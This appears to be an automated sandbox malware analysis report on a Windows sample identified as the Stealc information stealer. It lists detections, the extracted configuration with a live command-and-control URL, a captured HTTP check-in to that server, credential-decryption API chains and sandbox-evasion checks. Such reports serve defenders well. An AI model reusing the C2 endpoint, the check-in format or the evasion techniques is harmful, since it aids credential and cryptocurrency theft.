Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1529189
MD5: f7b1143886156d2a48fcda8f5dec586e
SHA1: d0f524caa5ff55008c62c71fe8bf47e5c9cb12b2
SHA256: 2b2dba893754d1e80e4fd6520017a706679796376cddcb37a09552e170e4ce21
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F7B1143886156D2A48FCDA8F5DEC586E)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (PCAP)
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7056 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7056 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches (unpacked PE)
Source | Rule | Description | Author
0.2.file.exe.be0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T18:26:14.098409+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49715 | 185.215.113.37 | 80 | TCP

                AV Detection

                Source: file.exe | Avira: detected
                Source: http://185.215.113.37/ | URL Reputation: Label: malware
                Source: http://185.215.113.37 | URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
                Source: 0.2.file.exe.be0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exe | Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE9B60 CryptUnprotectData,LocalAlloc,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49715 -> 185.215.113.37:80
                Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 38 32 34 45 36 34 39 34 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"77824E6494FB4109353171------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"doma------CGDGCFBAEGDHJKEBGCBA--
                Source: Joe Sandbox View | IP Address: 185.215.113.37
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/M
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
                Source: file.exe, 00000000.00000002.1399229578.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37s

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F330B5
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F5B0A1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAB061
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE5160
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F953
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E72128
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FAE2A4
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB3240
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB6BC6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE244F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE844F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF1C47
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECA54B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB17A9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E8EF21
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BE45C0 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: uwwmduoa ZLIB complexity 0.9947200123856708
                Source: file.exe, 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\J1TU0JXR.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.exe | Static file information: File size 1835520 > 1048576
                Source: file.exe | Static PE information: Raw size of uwwmduoa is bigger than: 0x100000 < 0x19a000

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uwwmduoa:EW;roqxtsuu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uwwmduoa:EW;roqxtsuu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x1cd38a should be: 0x1ca6aa
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: uwwmduoa
                Source: file.exe | Static PE information: section name: roqxtsuu
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104F91D push 304A7641h; mov dword ptr [esp], ebp (0_2_0104F939)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 2745F180h; mov dword ptr [esp], edx (0_2_00FB88D6)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], ecx (0_2_00FB890A)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push eax; mov dword ptr [esp], edi (0_2_00FB8926)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 3167293Eh; mov dword ptr [esp], edi (0_2_00FB8936)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], eax (0_2_00FB8980)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 2BFE7D55h; mov dword ptr [esp], edx (0_2_00FB8A32)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 31E54D54h; mov dword ptr [esp], edi (0_2_00FB8A7E)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 03052DDAh; mov dword ptr [esp], edx (0_2_00FB8A9C)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], edi (0_2_00FB8AC3)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 7A69479Eh; mov dword ptr [esp], ebx (0_2_00FB8AD9)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push eax; mov dword ptr [esp], ebp (0_2_00FB8ADD)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 09274CB2h; mov dword ptr [esp], eax (0_2_00FB8B1B)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], eax (0_2_00FB8B5B)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push eax; mov dword ptr [esp], 5BB97D04h (0_2_00FB8B5F)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 3E4E5128h; mov dword ptr [esp], esp (0_2_00FB8BA4)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], eax (0_2_00FB8C6E)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], 38368FE0h (0_2_00FB8C72)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push esi; mov dword ptr [esp], ebp (0_2_00FB8CEE)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push eax; mov dword ptr [esp], esi (0_2_00FB8D06)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 68EA52D2h; mov dword ptr [esp], edx (0_2_00FB8D94)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], 61953C7Fh (0_2_00FB8D9B)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push esi; mov dword ptr [esp], ebx (0_2_00FB8DCD)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 2645FD33h; mov dword ptr [esp], edi (0_2_00FB8E33)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], 7ECF1CC4h (0_2_00FB8E4A)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push edi; mov dword ptr [esp], eax (0_2_00FB8E8A)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push edi; mov dword ptr [esp], edx (0_2_00FB8F15)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push edi; mov dword ptr [esp], eax (0_2_00FB8FAF)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], eax (0_2_00FB8FB3)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push 6E89007Ch; mov dword ptr [esp], edx (0_2_00FB9050)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB88C1 push edx; mov dword ptr [esp], eax (0_2_00FB90CE)
                Source: file.exe | Static PE information: section name: uwwmduoa entropy: 7.952745504093785

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13640)
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADDE0 second address: FADDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533114h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADDFA second address: FADE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644CBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD165 second address: FBD189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6720533114h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F6720533106h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD189 second address: FBD18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD18D second address: FBD197 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD31C second address: FBD320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD320 second address: FBD336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533110h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD91E second address: FBD93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F67208644D6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD93E second address: FBD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F6720533116h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD95B second address: FBD973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD973 second address: FBD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF35E second address: FBF37B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67208644C8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F67208644CCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF37B second address: FBF3B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f jnc 00007F672053310Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F672053310Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF3B5 second address: E419C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b mov si, E1EAh 0x0000000f push dword ptr [ebp+122D0DD1h] 0x00000015 push edx 0x00000016 pop esi 0x00000017 call dword ptr [ebp+122D2D68h] 0x0000001d pushad 0x0000001e jmp 00007F67208644D1h 0x00000023 pushad 0x00000024 jmp 00007F67208644D6h 0x00000029 mov dword ptr [ebp+122D225Bh], ecx 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 mov dword ptr [ebp+122D225Bh], eax 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007F67208644CCh 0x00000041 mov dword ptr [ebp+122D2B50h], eax 0x00000047 cmc 0x00000048 add dword ptr [ebp+122D225Bh], esi 0x0000004e mov esi, 0000003Ch 0x00000053 cld 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 pushad 0x00000059 mov dword ptr [ebp+122D225Bh], ecx 0x0000005f pushad 0x00000060 mov edx, dword ptr [ebp+122D2BF4h] 0x00000066 stc 0x00000067 popad 0x00000068 popad 0x00000069 lodsw 0x0000006b jmp 00007F67208644D0h 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 sub dword ptr [ebp+122D225Bh], edi 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D225Bh], ecx 0x00000084 nop 0x00000085 pushad 0x00000086 push ecx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: FBF3F6 second address: FBF429 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F6720533114h 0x00000019 je 00007F6720533106h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
